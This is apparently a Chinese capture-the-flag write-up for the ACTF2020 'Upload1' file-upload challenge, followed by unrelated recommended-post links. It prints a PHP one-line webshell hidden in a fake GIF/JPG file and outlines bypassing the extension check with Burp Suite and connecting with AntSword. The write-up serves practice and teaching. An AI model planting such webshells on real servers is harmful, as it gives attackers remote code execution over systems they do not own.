[ACTF2020 新生赛]Upload1

不拿flag不改名2024-09-12 13:20

1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马

GIF89a? <script language="php">eval($_REQUEST[1])</script>

2、使用bp抓包修改后缀,点击发送

3、不关浏览器的代理,在bp中将该包放行

4、用蚁剑连接

5、在根目录中找到flag

相关推荐
Kapaseker6 分钟前
如果你的 View 不支持 Compose 怎么办
android·kotlin
珹洺28 分钟前
Java-Spring入门指南(五)Spring自动装配
android·java·spring
sylvia_081537 分钟前
react native 初次使用Android Studio 打包
android·react native·android studio
前行的小黑炭1 小时前
Android:在项目当中可能会遇到的ANR,应该如何解决?
android·java·kotlin
老衲不服5 小时前
android 三方sdk minSdkVersion 兼容问题处理
android
android_xc8 小时前
Android Studio国内仓库配置
android·ide·android studio
alexhilton8 小时前
runBlocking实践:哪里该使用,哪里不该用
android·kotlin·android jetpack
2501_915106329 小时前
iOS 使用记录和能耗监控实战,如何查看电池电量消耗、App 使用时长与性能数据(uni-app 开发调试必备指南)
android·ios·小程序·uni-app·cocoa·iphone·webview
雨白9 小时前
深入解析 Android 多点触摸:从原理到实战
android
爱隐身的官人10 小时前
cfshow-web入门-php特性
python·php·ctf
热门推荐
01UV安装并设置国内源02A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程03UV 工具安装与国内镜像源配置指南04教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员05解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题06突破百度网盘的下载限速,两种方法教会你【超详细】07conda中设置镜像地址(附所有可换的地址)08KGG转MP3工具|非KGM文件|解密音频09Nano Banana免费方案来了!Docker 一键部署 + 魔搭即开即用,小白也能玩转 AI 图像编辑102025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!